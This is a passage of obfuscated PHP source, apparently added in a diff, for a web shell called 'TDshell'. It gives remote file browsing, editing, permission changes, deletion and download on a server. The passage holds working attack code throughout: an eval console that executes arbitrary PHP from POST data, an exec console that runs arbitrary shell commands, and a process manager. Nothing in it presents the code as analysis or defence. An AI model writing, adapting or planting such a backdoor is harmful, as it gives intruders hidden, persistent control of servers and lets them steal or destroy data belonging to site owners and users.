" . $this->make_link("list", array("dir" => $_bf765329c68fb45566ab3b1af145d2c2 . DIRECTORY_SEPARATOR), $_a70fd9147fda16858f57fe0479d66df0) . "LINK" . @date ("F d Y H:i:s.", @filemtime($_bf765329c68fb45566ab3b1af145d2c2)) . "$_ca3b4c9ef3a45b7d6dc6af03bad1367b|$_35b2f08320a2169a648d2377cae768d3" . $this->make_link("dir", array("name" => $_bf765329c68fb45566ab3b1af145d2c2, "act" => "chmod"), view_perms_color($_bf765329c68fb45566ab3b1af145d2c2)) . "" . $this->make_link("dir", array("name" => $_bf765329c68fb45566ab3b1af145d2c2, "act" => "info"), "[info]") . " - " . $this->make_link("dir", array("name" => $_bf765329c68fb45566ab3b1af145d2c2, "act" => "chmod"), "[chmod]") . " - " . $this->make_link("dir", array("name" => $_bf765329c68fb45566ab3b1af145d2c2, "act" => "delete"), "[delete]") . "
[" . $this->make_link("list", array("dir" => $_b52f6a3170e004ef525cff1e536b7427 . DIRECTORY_SEPARATOR), $_23e43c1054e39145ffd2c948f87f107c) . "]" . view_size(@filesize($_b52f6a3170e004ef525cff1e536b7427)) . "" . @date ("F d Y H:i:s.", @filemtime($_b52f6a3170e004ef525cff1e536b7427)) . "$_a7fcd5fac3ae867f8cdb4eb46a683477|$_82e66704cd450201cf5168d64d52a4d3" . $this->make_link("dir", array("name" => $_b52f6a3170e004ef525cff1e536b7427, "act" => "chmod"), view_perms_color($_b52f6a3170e004ef525cff1e536b7427)) . "" . $this->make_link("dir", array("name" => $_b52f6a3170e004ef525cff1e536b7427, "act" => "info"), "[info]") . " - " . $this->make_link("dir", array("name" => $_b52f6a3170e004ef525cff1e536b7427, "act" => "chmod"), "[chmod]") . " - " . $this->make_link("dir", array("name" => $_b52f6a3170e004ef525cff1e536b7427, "act" => "delete"), "[delete]") . "
" . $this->make_link("file", array("name" => $_f3f7e9f4a6ad2cc07b147484d501377d, "act" => "view"), $_0136b647df83da4bb9a70b41420d9e05). "" . $_ed02210e63e304003de8ccd669607668 . "" . @date ("F d Y H:i:s.", @filemtime($_f3f7e9f4a6ad2cc07b147484d501377d)) . "$_d2f5e3cb12e93bae6c4981faf06db693|$_048403d36ad14f408d11cb9c81b09d29" . $this->make_link("file", array("name" => $_f3f7e9f4a6ad2cc07b147484d501377d, "act" => "chmod"), view_perms_color($_f3f7e9f4a6ad2cc07b147484d501377d)) . "" . $this->make_link("file", array("act" => "edit", "name" => $_f3f7e9f4a6ad2cc07b147484d501377d), "[edit]") . ' - ' . $this->make_link("file", array("act" => "delete", "name" => $_f3f7e9f4a6ad2cc07b147484d501377d), "[delete]") . ' - ' . $this->make_link("file", array("act" => "view", "name" => $_f3f7e9f4a6ad2cc07b147484d501377d), "[view]") . ' - "download", "name" => $_f3f7e9f4a6ad2cc07b147484d501377d), NULL, TRUE) . '" target="_blank">[download] - [MD5][+]
MD5 Hash: ' . $_55b73f20aeec06c5111b6ba95bf29532 . '
' . "
"); + break; + case "file": + $_2e5c25529adea7d7ad4802936aee0b48 = $_ec4ae32bf3e3a09bae7ff3e84ebbc667['act']; + $_d3befca3813d65aff84c2353e705a0dd = $_ec4ae32bf3e3a09bae7ff3e84ebbc667['name']; + if (empty($_2e5c25529adea7d7ad4802936aee0b48)) + { + $this->out("
Error: no act was specified
"); + return FALSE; + }; + if ($_2e5c25529adea7d7ad4802936aee0b48 == "view") + { + if (!@is_file($_d3befca3813d65aff84c2353e705a0dd) || !@is_readable($_d3befca3813d65aff84c2353e705a0dd)) + { + $this->out("
Error: the file does not exist or could not be read from.
"); + return FALSE; + }; + $_4894710f990f9bda9ef69a94d3de9a25['basename'] = @basename($_d3befca3813d65aff84c2353e705a0dd); + $_4894710f990f9bda9ef69a94d3de9a25['path'] = @pathinfo($_d3befca3813d65aff84c2353e705a0dd); + $_4894710f990f9bda9ef69a94d3de9a25['path'] = processdir($_4894710f990f9bda9ef69a94d3de9a25['path']['dirname']) . $_4894710f990f9bda9ef69a94d3de9a25['basename']; + $_4894710f990f9bda9ef69a94d3de9a25['size'] = view_size(@filesize($_d3befca3813d65aff84c2353e705a0dd)); + $_4894710f990f9bda9ef69a94d3de9a25['md5'] = @md5_file($_d3befca3813d65aff84c2353e705a0dd); + $_d2f5e3cb12e93bae6c4981faf06db693 = @posix_getpwuid(@fileowner($_d3befca3813d65aff84c2353e705a0dd)); + $_048403d36ad14f408d11cb9c81b09d29 = @posix_getgrgid(@filegroup($_d3befca3813d65aff84c2353e705a0dd)); + $_d2f5e3cb12e93bae6c4981faf06db693 = $_d2f5e3cb12e93bae6c4981faf06db693["name"]; + $_048403d36ad14f408d11cb9c81b09d29 = $_048403d36ad14f408d11cb9c81b09d29["name"]; + $_4894710f990f9bda9ef69a94d3de9a25['owner_group'] = "$_d2f5e3cb12e93bae6c4981faf06db693|$_048403d36ad14f408d11cb9c81b09d29"; + $_4894710f990f9bda9ef69a94d3de9a25['permissions'] = view_perms_color($_d3befca3813d65aff84c2353e705a0dd); + $_4894710f990f9bda9ef69a94d3de9a25['modified'] = @date ("F d Y H:i:s.", @filemtime($_d3befca3813d65aff84c2353e705a0dd)); + $_4894710f990f9bda9ef69a94d3de9a25['created'] = @date ("F d Y H:i:s.", @filectime($_d3befca3813d65aff84c2353e705a0dd)); + $_4894710f990f9bda9ef69a94d3de9a25['accessed'] = @date ("F d Y H:i:s.", @fileatime($_d3befca3813d65aff84c2353e705a0dd)); + $this->out(' + + + + + + +
+
+ ' . $_4894710f990f9bda9ef69a94d3de9a25['basename'] . ' +
+
+ + + + + +
+
File Information
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ Path: ' . $_4894710f990f9bda9ef69a94d3de9a25['path'] . ' +
+ Size: ' . $_4894710f990f9bda9ef69a94d3de9a25['size'] . ' +
+ MD5: ' . $_4894710f990f9bda9ef69a94d3de9a25['md5'] . ' +
+ Owner|Group: ' . $_4894710f990f9bda9ef69a94d3de9a25['owner_group'] . ' +
+ Permissions: ' . $this->make_link("file", array("act" => "chmod", "name" => $_d3befca3813d65aff84c2353e705a0dd), $_4894710f990f9bda9ef69a94d3de9a25['permissions']) . ' +
+ Creation: ' . $_4894710f990f9bda9ef69a94d3de9a25['created'] . '
+ Modification: ' . $_4894710f990f9bda9ef69a94d3de9a25['modified'] . '
+ Access: ' . $_4894710f990f9bda9ef69a94d3de9a25['accessed'] . '
+
+
File Actions
+ + + + + + + + + + + + + + + + + + + +
+ + ' . $this->make_link("file", array("act" => "edit", "name" => $_d3befca3813d65aff84c2353e705a0dd), "[edit]") . ' + +
' . $this->make_link("file", array("act" => "chmod", "name" => $_d3befca3813d65aff84c2353e705a0dd), "[chmod]") . '
+ ' . $this->make_link("file", array("act" => "move", "name" => $_d3befca3813d65aff84c2353e705a0dd), "[move]") . ' +
+ ' . $this->make_link("file", array("act" => "copy", "name" => $_d3befca3813d65aff84c2353e705a0dd), "[copy]") . ' +
+ ' . $this->make_link("file", array("act" => "delete", "name" => $_d3befca3813d65aff84c2353e705a0dd), "[delete]") . ' +
+ "download", "name" => $_d3befca3813d65aff84c2353e705a0dd), NULL, TRUE) . '" target="_blank">[download] +
+
+
'); + } + elseif ($_2e5c25529adea7d7ad4802936aee0b48 == "chmod") + { + if (!@is_file($_d3befca3813d65aff84c2353e705a0dd)) + { + $this->out("
Error: the file does not exist or could not be read from.
"); + return FALSE; + }; + $_4efbfa502ea6e58b84de1cdc04aecadf = $_POST['newmode']; + if (empty($_4efbfa502ea6e58b84de1cdc04aecadf)) + { + $_2211b5dc6bb7947adcb0bf14cee6591e = @pathinfo($_d3befca3813d65aff84c2353e705a0dd); + $_2211b5dc6bb7947adcb0bf14cee6591e = $_2211b5dc6bb7947adcb0bf14cee6591e['dirname']; + $_9074596a8e59a87e41db87f3029b4959 = @basename($_d3befca3813d65aff84c2353e705a0dd); + $_13f531c0ca48f6a5f8315121bf59ffaa = file_perms($_d3befca3813d65aff84c2353e705a0dd, TRUE); + $this->out("Changing file permissions of " . processdir($_2211b5dc6bb7947adcb0bf14cee6591e) . $this->make_link("file", array("act" => "view", "name" => $_d3befca3813d65aff84c2353e705a0dd), $_9074596a8e59a87e41db87f3029b4959) . ", " . view_perms_color($_d3befca3813d65aff84c2353e705a0dd) . " (".substr(decoct(fileperms($_d3befca3813d65aff84c2353e705a0dd)),-4,4).")
" . '
"chmod", "name" => $_d3befca3813d65aff84c2353e705a0dd), NULL, TRUE) . '">
'); + } + else + { + $_4efbfa502ea6e58b84de1cdc04aecadf = @intval($_4efbfa502ea6e58b84de1cdc04aecadf); + $_d3befca3813d65aff84c2353e705a0dd = @base64_encode($_d3befca3813d65aff84c2353e705a0dd); + $_16d3c4cdd343a37db4994c3591c83993 = "chmod (base64_decode('" . $_d3befca3813d65aff84c2353e705a0dd . "'), 0" . $_4efbfa502ea6e58b84de1cdc04aecadf . ");"; + if (eval($_16d3c4cdd343a37db4994c3591c83993) === FALSE) + { + $_d3befca3813d65aff84c2353e705a0dd = @base64_decode($_d3befca3813d65aff84c2353e705a0dd); + $this->out("
Failed to change permissions of file. " . $this->make_link("file", array("name" => $_d3befca3813d65aff84c2353e705a0dd, "act" => "view"), " Click here to go back to file.") . "
"); + } + else + { + @clearstatcache(); + $_d3befca3813d65aff84c2353e705a0dd = @base64_decode($_d3befca3813d65aff84c2353e705a0dd); + $_2211b5dc6bb7947adcb0bf14cee6591e = @pathinfo($_d3befca3813d65aff84c2353e705a0dd); + $_2211b5dc6bb7947adcb0bf14cee6591e = $_2211b5dc6bb7947adcb0bf14cee6591e['dirname']; + $_9074596a8e59a87e41db87f3029b4959 = basename($_d3befca3813d65aff84c2353e705a0dd); + $_13f531c0ca48f6a5f8315121bf59ffaa = file_perms($_d3befca3813d65aff84c2353e705a0dd, TRUE); + $this->out("Changing file permissions of " . processdir($_2211b5dc6bb7947adcb0bf14cee6591e) . $this->make_link("file", array("act" => "view", "name" => $_d3befca3813d65aff84c2353e705a0dd), $_9074596a8e59a87e41db87f3029b4959) . ", " . view_perms_color($_d3befca3813d65aff84c2353e705a0dd) . " (".substr(decoct(fileperms($_d3befca3813d65aff84c2353e705a0dd)),-4,4).")
" . '
"chmod", "name" => $_d3befca3813d65aff84c2353e705a0dd), NULL, TRUE) . '">
'); + }; + }; + } + elseif ($_2e5c25529adea7d7ad4802936aee0b48 == "edit") + { + $this->out("
"); + if (!@is_file($_d3befca3813d65aff84c2353e705a0dd) || !@is_readable($_d3befca3813d65aff84c2353e705a0dd)) + { + $this->out("
Error: the file does not exist or could not be read from.
"); + return FALSE; + }; + if (!isset($_POST['newdata'])) + { + $_2211b5dc6bb7947adcb0bf14cee6591e = @pathinfo($_d3befca3813d65aff84c2353e705a0dd); + $_2211b5dc6bb7947adcb0bf14cee6591e = $_2211b5dc6bb7947adcb0bf14cee6591e['dirname']; + $_9074596a8e59a87e41db87f3029b4959 = @basename($_d3befca3813d65aff84c2353e705a0dd); + $this->out("Editing file " . processdir($_2211b5dc6bb7947adcb0bf14cee6591e) . $this->make_link("file", array("act" => "view", "name" => $_d3befca3813d65aff84c2353e705a0dd), $_9074596a8e59a87e41db87f3029b4959) . "
" . '
"edit", "name" => $_d3befca3813d65aff84c2353e705a0dd), NULL, TRUE) . '" enctype="multipart/form-data">
'); + } + else + { + $_4aac6af23de22a66b42d8ba63e7fc9fe = $_POST['newdata']; + $_4aac6af23de22a66b42d8ba63e7fc9fe = @stripslashes($_4aac6af23de22a66b42d8ba63e7fc9fe); + $_c14f19c15d50e72a5733c0ad88a035b9 = @fopen($_d3befca3813d65aff84c2353e705a0dd, "w"); + @fwrite($_c14f19c15d50e72a5733c0ad88a035b9, $_4aac6af23de22a66b42d8ba63e7fc9fe); + @fclose($_c14f19c15d50e72a5733c0ad88a035b9); + $_2211b5dc6bb7947adcb0bf14cee6591e = @pathinfo($_d3befca3813d65aff84c2353e705a0dd); + $_2211b5dc6bb7947adcb0bf14cee6591e = $_2211b5dc6bb7947adcb0bf14cee6591e['dirname']; + $_9074596a8e59a87e41db87f3029b4959 = @basename($_d3befca3813d65aff84c2353e705a0dd); + $this->out("Editing file " . processdir($_2211b5dc6bb7947adcb0bf14cee6591e) . $this->make_link("file", array("act" => "view", "name" => $_d3befca3813d65aff84c2353e705a0dd), $_9074596a8e59a87e41db87f3029b4959) . "
" . 'Success!
"edit", "name" => $_d3befca3813d65aff84c2353e705a0dd), NULL, TRUE) . '" enctype="multipart/form-data">
'); + }; + $this->out("
"); + } + elseif ($_2e5c25529adea7d7ad4802936aee0b48 == "move") + { + $_d0b3e9370ba342bbae976cec71233e51 = $_POST['moveto']; + $_2211b5dc6bb7947adcb0bf14cee6591e = @pathinfo($_d3befca3813d65aff84c2353e705a0dd); + $_9074596a8e59a87e41db87f3029b4959 = @basename($_d3befca3813d65aff84c2353e705a0dd); + $_2211b5dc6bb7947adcb0bf14cee6591e = $_2211b5dc6bb7947adcb0bf14cee6591e['dirname']; + if (!isset($_POST['moveto'])) + { + $this->out("Preparing to move file " . processdir($_2211b5dc6bb7947adcb0bf14cee6591e) . $this->make_link("file", array("act" => "view", "name" => $_d3befca3813d65aff84c2353e705a0dd), $_9074596a8e59a87e41db87f3029b4959) . "
" . '
"move", "name" => $_d3befca3813d65aff84c2353e705a0dd), NULL, TRUE) . '" method="post">
'); + } + else + { + $_d0b3e9370ba342bbae976cec71233e51 = @htmlspecialchars_decode($_d0b3e9370ba342bbae976cec71233e51); + if (!@rename($_d3befca3813d65aff84c2353e705a0dd, $_d0b3e9370ba342bbae976cec71233e51)) + { + $this->out("Preparing to move file " . processdir($_2211b5dc6bb7947adcb0bf14cee6591e) . $this->make_link("file", array("act" => "view", "name" => $_d3befca3813d65aff84c2353e705a0dd), $_9074596a8e59a87e41db87f3029b4959) . "
Failed!
" . '
"move", "name" => $_d3befca3813d65aff84c2353e705a0dd), NULL, TRUE) . '" method="post">
'); + } + else + { + $_2211b5dc6bb7947adcb0bf14cee6591e = $_d0b3e9370ba342bbae976cec71233e51; + $_2211b5dc6bb7947adcb0bf14cee6591e = @pathinfo($_2211b5dc6bb7947adcb0bf14cee6591e); + $_2211b5dc6bb7947adcb0bf14cee6591e = $_2211b5dc6bb7947adcb0bf14cee6591e['dirname']; + $_9074596a8e59a87e41db87f3029b4959 = @basename($_d0b3e9370ba342bbae976cec71233e51); + $this->out("Preparing to move file " . processdir($_2211b5dc6bb7947adcb0bf14cee6591e) . $this->make_link("file", array("act" => "view", "name" => $_d0b3e9370ba342bbae976cec71233e51), $_9074596a8e59a87e41db87f3029b4959) . "
Success!
" . '
"move", "name" => $_d3befca3813d65aff84c2353e705a0dd), NULL, TRUE) . '" method="post" enctype="text/plain">
'); + }; + }; + } + elseif ($_2e5c25529adea7d7ad4802936aee0b48 == "copy") + { + $_d4328d5d2bbd5a7a94ae0b56d6e6aade = $_POST['copyto']; + $_2211b5dc6bb7947adcb0bf14cee6591e = @pathinfo($_d3befca3813d65aff84c2353e705a0dd); + $_9074596a8e59a87e41db87f3029b4959 = @basename($_d3befca3813d65aff84c2353e705a0dd); + $_2211b5dc6bb7947adcb0bf14cee6591e = $_2211b5dc6bb7947adcb0bf14cee6591e['dirname']; + if (!isset($_POST['copyto'])) + { + $this->out("Preparing to copy file " . processdir($_2211b5dc6bb7947adcb0bf14cee6591e) . $this->make_link("file", array("act" => "view", "name" => $_d3befca3813d65aff84c2353e705a0dd), $_9074596a8e59a87e41db87f3029b4959) . "
" . '
"copy", "name" => $_d3befca3813d65aff84c2353e705a0dd), NULL, TRUE) . '" method="post">
'); + } + else + { + $_d4328d5d2bbd5a7a94ae0b56d6e6aade = @htmlspecialchars_decode($_d4328d5d2bbd5a7a94ae0b56d6e6aade); + if (!@copy($_d3befca3813d65aff84c2353e705a0dd, $_d4328d5d2bbd5a7a94ae0b56d6e6aade)) + { + $this->out("Preparing to copy file " . processdir($_2211b5dc6bb7947adcb0bf14cee6591e) . $this->make_link("file", array("act" => "view", "name" => $_d3befca3813d65aff84c2353e705a0dd), $_9074596a8e59a87e41db87f3029b4959) . "
Failed!
" . '
"copy", "name" => $_d3befca3813d65aff84c2353e705a0dd), NULL, TRUE) . '" method="post">
'); + } + else + { + $this->out("Preparing to copy file " . processdir($_2211b5dc6bb7947adcb0bf14cee6591e) . $this->make_link("file", array("act" => "view", "name" => $_d3befca3813d65aff84c2353e705a0dd), $_9074596a8e59a87e41db87f3029b4959) . "
Success!
" . '
"copy", "name" => $_d3befca3813d65aff84c2353e705a0dd), NULL, TRUE) . '" method="post">
'); + }; + }; + } + elseif ($_2e5c25529adea7d7ad4802936aee0b48 == "delete") + { + $_2a46f3328eaed89ef8402d4effba331e = $_POST['confirm_delete']; + if (!isset($_POST['confirm_delete'])) + { + $_2211b5dc6bb7947adcb0bf14cee6591e = @pathinfo($_d3befca3813d65aff84c2353e705a0dd); + $_9074596a8e59a87e41db87f3029b4959 = @basename($_d3befca3813d65aff84c2353e705a0dd); + $_2211b5dc6bb7947adcb0bf14cee6591e = $_2211b5dc6bb7947adcb0bf14cee6591e['dirname']; + $this->out("Are you sure you wish to delete file " . processdir($_2211b5dc6bb7947adcb0bf14cee6591e) . $this->make_link("file", array("act" => "view", "name" => $_d3befca3813d65aff84c2353e705a0dd), $_9074596a8e59a87e41db87f3029b4959) . "
" . '
"delete", "name" => $_d3befca3813d65aff84c2353e705a0dd), NULL, TRUE) . '" method="post">
'); + } + else + { + $_2211b5dc6bb7947adcb0bf14cee6591e = @pathinfo($_d3befca3813d65aff84c2353e705a0dd); + $_9074596a8e59a87e41db87f3029b4959 = @basename($_d3befca3813d65aff84c2353e705a0dd); + $_2211b5dc6bb7947adcb0bf14cee6591e = $_2211b5dc6bb7947adcb0bf14cee6591e['dirname']; + if (!@unlink($_d3befca3813d65aff84c2353e705a0dd)) + { + $this->out("Are you sure you wish to delete file " . processdir($_2211b5dc6bb7947adcb0bf14cee6591e) . $this->make_link("file", array("act" => "view", "name" => $_d3befca3813d65aff84c2353e705a0dd), $_9074596a8e59a87e41db87f3029b4959) . "
Failed!
" . '
"delete", "name" => $_d3befca3813d65aff84c2353e705a0dd), NULL, TRUE) . '" method="post">
'); + } + else + { + $this->out("File Deleted.
" . $this->make_link("list", array("name" => $_2211b5dc6bb7947adcb0bf14cee6591e), "Click here to go back.")); + }; + } + } + elseif ($_2e5c25529adea7d7ad4802936aee0b48 == "download") + { + if (!@is_file($_d3befca3813d65aff84c2353e705a0dd) || !@is_readable($_d3befca3813d65aff84c2353e705a0dd)) + { + if (@is_file($_d3befca3813d65aff84c2353e705a0dd)) + { + $_2211b5dc6bb7947adcb0bf14cee6591e = @pathinfo($_d3befca3813d65aff84c2353e705a0dd); + $_2211b5dc6bb7947adcb0bf14cee6591e = $_2211b5dc6bb7947adcb0bf14cee6591e['dirname']; + } + else + { + $_2211b5dc6bb7947adcb0bf14cee6591e = ""; + }; + $this->out("Could not download file.
" . $this->make_link("list", array("name" => $_2211b5dc6bb7947adcb0bf14cee6591e), "Click here to go back.")); + } + @header("Cache-Control: public, must-revalidate"); + @header("Content-Type: application/octet-stream"); + @header("Content-Length: " . (string)filesize($_d3befca3813d65aff84c2353e705a0dd)); + @header('Content-Disposition: attachment; filename="'.basename($_d3befca3813d65aff84c2353e705a0dd).'"'); + @header("Content-Transfer-Encoding: binary"); + @readfile($_d3befca3813d65aff84c2353e705a0dd); + exit; + } + else + { + $this->process("file", array("name" => $_d3befca3813d65aff84c2353e705a0dd, "act" => "view")); + return FALSE; + }; + break; + case "dir": + $_2e5c25529adea7d7ad4802936aee0b48 = $_ec4ae32bf3e3a09bae7ff3e84ebbc667['act']; + $_d3befca3813d65aff84c2353e705a0dd = $_ec4ae32bf3e3a09bae7ff3e84ebbc667['name']; + if (empty($_2e5c25529adea7d7ad4802936aee0b48)) + { + $this->out("
Error: no act was specified
"); + return FALSE; + }; + if ($_2e5c25529adea7d7ad4802936aee0b48 == "info") + { + if ((@is_dir($_d3befca3813d65aff84c2353e705a0dd)) && (@is_readable($_d3befca3813d65aff84c2353e705a0dd . DIRECTORY_SEPARATOR))) + { + $_d69e2bdf98584fc6cce9c9f9a9eb8b6a = listDir($_d3befca3813d65aff84c2353e705a0dd . DIRECTORY_SEPARATOR); + $this->out(' + + + + + + +
+
+ ' . processdir($_d3befca3813d65aff84c2353e705a0dd) . ' +
+
+ + + + + +
+
Directory Information
+ + + + + + + +
+ Files: ' . @count($_d69e2bdf98584fc6cce9c9f9a9eb8b6a['FILES']) . ' +
+ Subdirectories: ' . @count($_d69e2bdf98584fc6cce9c9f9a9eb8b6a['DIRS']) . ' +
+
+
Directory Actions
+ + + + + + + + + + +
+ + ' . $this->make_link("dir", array("act" => "chmod", "name" => $_d3befca3813d65aff84c2353e705a0dd), "[chmod]") . ' + +
+ + ' . $this->make_link("dir", array("act" => "move", "name" => $_d3befca3813d65aff84c2353e705a0dd), "[move]") . ' + +
+ + ' . $this->make_link("dir", array("act" => "delete", "name" => $_d3befca3813d65aff84c2353e705a0dd), "[delete]") . ' + +
+
+
'); + } + else + { + $this->out("
Directory is invalid.
"); + }; + } + elseif ($_2e5c25529adea7d7ad4802936aee0b48 == "chmod") + { + if (!@is_dir($_d3befca3813d65aff84c2353e705a0dd)) + { + $this->out("
Error: the directory does not exist or could not be read from.
"); + return FALSE; + }; + $_4efbfa502ea6e58b84de1cdc04aecadf = $_POST['newmode']; + $_13f531c0ca48f6a5f8315121bf59ffaa = file_perms($_d3befca3813d65aff84c2353e705a0dd, TRUE); + if (empty($_4efbfa502ea6e58b84de1cdc04aecadf)) + { + $_2211b5dc6bb7947adcb0bf14cee6591e = $_d3befca3813d65aff84c2353e705a0dd; + $this->out("Changing file permissions of " . processdir($_2211b5dc6bb7947adcb0bf14cee6591e) . ", " . view_perms_color($_d3befca3813d65aff84c2353e705a0dd) . " (".@substr(@decoct(@fileperms($_d3befca3813d65aff84c2353e705a0dd)),-4,4).")
" . '
"chmod", "name" => $_d3befca3813d65aff84c2353e705a0dd), NULL, TRUE) . '">
'); + } + else + { + $_4efbfa502ea6e58b84de1cdc04aecadf = @intval($_4efbfa502ea6e58b84de1cdc04aecadf); + $_d3befca3813d65aff84c2353e705a0dd = @base64_encode($_d3befca3813d65aff84c2353e705a0dd); + $_16d3c4cdd343a37db4994c3591c83993 = "chmod (base64_decode('$_d3befca3813d65aff84c2353e705a0dd'), 0$_4efbfa502ea6e58b84de1cdc04aecadf);"; + if (eval($_16d3c4cdd343a37db4994c3591c83993) === FALSE) + { + $_d3befca3813d65aff84c2353e705a0dd = base64_decode($_d3befca3813d65aff84c2353e705a0dd); + $this->out("
Failed to change permissions of the directory. " . $this->make_link("file", array("dir" => $_d3befca3813d65aff84c2353e705a0dd, "act" => "view"), " Click here to go back to the directory.") . "
"); + } + else + { + @clearstatcache(); + $_d3befca3813d65aff84c2353e705a0dd = @base64_decode($_d3befca3813d65aff84c2353e705a0dd); + $_2211b5dc6bb7947adcb0bf14cee6591e = @pathinfo($_d3befca3813d65aff84c2353e705a0dd); + $_2211b5dc6bb7947adcb0bf14cee6591e = $_2211b5dc6bb7947adcb0bf14cee6591e['dirname']; + $_9074596a8e59a87e41db87f3029b4959 = @basename($_d3befca3813d65aff84c2353e705a0dd); + $_13f531c0ca48f6a5f8315121bf59ffaa = file_perms($_d3befca3813d65aff84c2353e705a0dd, TRUE); + $this->out("Changing file permissions of " . processdir($_2211b5dc6bb7947adcb0bf14cee6591e) . ", " . view_perms_color($_d3befca3813d65aff84c2353e705a0dd) . " (".@substr(@decoct(@fileperms($_d3befca3813d65aff84c2353e705a0dd)),-4,4).")
" . 'Success!
"chmod", "name" => $_d3befca3813d65aff84c2353e705a0dd), NULL, TRUE) . '">
'); + }; + }; + } + elseif ($_2e5c25529adea7d7ad4802936aee0b48 == "move") + { + $_d0b3e9370ba342bbae976cec71233e51 = $_POST['moveto']; + $_2211b5dc6bb7947adcb0bf14cee6591e = $_d3befca3813d65aff84c2353e705a0dd; + if (!isset($_POST['moveto'])) + { + $this->out("Preparing to move directory " . processdir($_2211b5dc6bb7947adcb0bf14cee6591e) . "
" . '
"move", "name" => $_d3befca3813d65aff84c2353e705a0dd), NULL, TRUE) . '" method="post">
'); + } + else + { + $_d0b3e9370ba342bbae976cec71233e51 = @htmlspecialchars_decode($_d0b3e9370ba342bbae976cec71233e51); + if (!@rename($_d3befca3813d65aff84c2353e705a0dd, $_d0b3e9370ba342bbae976cec71233e51)) + { + $this->out("Preparing to move directory " . processdir($_2211b5dc6bb7947adcb0bf14cee6591e) . "
Failed!
" . '
"move", "name" => $_d3befca3813d65aff84c2353e705a0dd), NULL, TRUE) . '" method="post">
'); + } + else + { + $this->out("Preparing to move directory " . processdir($_d0b3e9370ba342bbae976cec71233e51) . "
Success!
" . '
"move", "name" => $_d0b3e9370ba342bbae976cec71233e51), NULL, TRUE) . '" method="post">
'); + }; + }; + } + elseif ($_2e5c25529adea7d7ad4802936aee0b48 == "delete") + { + $_2a46f3328eaed89ef8402d4effba331e = $_POST['confirm_delete']; + if (!isset($_POST['confirm_delete'])) + { + $_2211b5dc6bb7947adcb0bf14cee6591e = $_d3befca3813d65aff84c2353e705a0dd; + $this->out("Are you sure you wish to delete directory " . processdir($_2211b5dc6bb7947adcb0bf14cee6591e) . "
" . '
"delete", "name" => $_d3befca3813d65aff84c2353e705a0dd), NULL, TRUE) . '" method="post">
'); + } + else + { + $_2211b5dc6bb7947adcb0bf14cee6591e = $_d3befca3813d65aff84c2353e705a0dd; + if (!delete_directory($_d3befca3813d65aff84c2353e705a0dd)) + { + $this->out("Are you sure you wish to delete directory " . processdir($_2211b5dc6bb7947adcb0bf14cee6591e) . "
Failed!
" . '
"delete", "name" => $_d3befca3813d65aff84c2353e705a0dd), NULL, TRUE) . '" method="post">
'); + } + else + { + $_2211b5dc6bb7947adcb0bf14cee6591e = @pathinfo($_2211b5dc6bb7947adcb0bf14cee6591e); + $_2211b5dc6bb7947adcb0bf14cee6591e = $_2211b5dc6bb7947adcb0bf14cee6591e['dirname']; + $this->out("Directory Deleted.
" . $this->make_link("list", array("name" => $_2211b5dc6bb7947adcb0bf14cee6591e), "Click here to go back.")); + }; + } + } + else + { + $this->process("dir", array("name" => $_d3befca3813d65aff84c2353e705a0dd, "act" => "info")); + return FALSE; + }; + break; + case "sql": + $this->out("
(My)SQL Support will be added in future versions of TDshell.
"); + break; + case "eval": + $_202860a67864e2245a32e15193fe3cf4 = $_POST['evaldata']; + $_4e708563acf942967766e0209568749c = $_POST['evalmethod']; + if (empty($_202860a67864e2245a32e15193fe3cf4)) + { + $this->out('
Evaluation Console
Display in TextBox
Display normally
'); + } + else + { + $_202860a67864e2245a32e15193fe3cf4 = @stripslashes($_202860a67864e2245a32e15193fe3cf4); + if ($_4e708563acf942967766e0209568749c == "textbox") + { + @ob_start(); + eval($_202860a67864e2245a32e15193fe3cf4); + $_abeb01d5ff8f108e1106e763a15f95ed .= @ob_get_clean(); + $_abeb01d5ff8f108e1106e763a15f95ed = @htmlspecialchars($_abeb01d5ff8f108e1106e763a15f95ed); + $this->out('
Evaluation Console
Display in TextBox
Display normally
'); + } + else + { + @ob_start(); + eval($_202860a67864e2245a32e15193fe3cf4); + $_abeb01d5ff8f108e1106e763a15f95ed = @ob_get_clean(); + $this->out('
Evaluation Console
' . $_abeb01d5ff8f108e1106e763a15f95ed . '
Display in TextBox
Display normally
'); + }; + }; + break; + + case "exec": + $_2b2605084efea7c9994ec50aacf83c64 = $_POST['execdata']; + $_4e708563acf942967766e0209568749c = $_POST['execmethod']; + if (empty($_2b2605084efea7c9994ec50aacf83c64)) + { + $_2b2605084efea7c9994ec50aacf83c64 = $_ec4ae32bf3e3a09bae7ff3e84ebbc667['otherexec']; + }; + if (empty($_4e708563acf942967766e0209568749c)) + { + $_4e708563acf942967766e0209568749c = $_ec4ae32bf3e3a09bae7ff3e84ebbc667['othermethod']; + }; + if (empty($_2b2605084efea7c9994ec50aacf83c64)) + { + $this->out('
Execution Console
Display in TextBox
Display normally
'); + } + else + { + $_2b2605084efea7c9994ec50aacf83c64 = @stripslashes($_2b2605084efea7c9994ec50aacf83c64); + if ($_4e708563acf942967766e0209568749c == "textbox") + { + @ob_start(); + echo custom_exec($_2b2605084efea7c9994ec50aacf83c64); + $_abeb01d5ff8f108e1106e763a15f95ed .= @ob_get_clean(); + $_abeb01d5ff8f108e1106e763a15f95ed = @htmlspecialchars($_abeb01d5ff8f108e1106e763a15f95ed); + $this->out('
Execution Console
Display in TextBox
Display normally
'); + } + else + { + @ob_start(); + echo custom_exec($_2b2605084efea7c9994ec50aacf83c64); + $_abeb01d5ff8f108e1106e763a15f95ed .= @ob_get_clean(); + $_abeb01d5ff8f108e1106e763a15f95ed = @htmlspecialchars($_abeb01d5ff8f108e1106e763a15f95ed); + $this->out('
Execution Console
' . $_abeb01d5ff8f108e1106e763a15f95ed . '
Display in TextBox
Display normally
'); + }; + }; + break; + + case "proc": + $_57eefc72bcbe3daf2bb185189468725a = $_ec4ae32bf3e3a09bae7ff3e84ebbc667['do']; + if (empty($_57eefc72bcbe3daf2bb185189468725a)) + { + $_4bc9908fada98cbfd1396fceed921faa = '/^([A-Za-z0-9]*)\\s{1,}([0-9]{1,10})\\s{1,}.*[0-9]{1,}:[0-9]{2,}\\s(.*)$/'; + + if (!($_c9a15425a6e12ac0295a2b759e048768 = custom_exec("ps aux"))) + { + $this->out("
TDshell Process Manager Failed: No valid permissions.
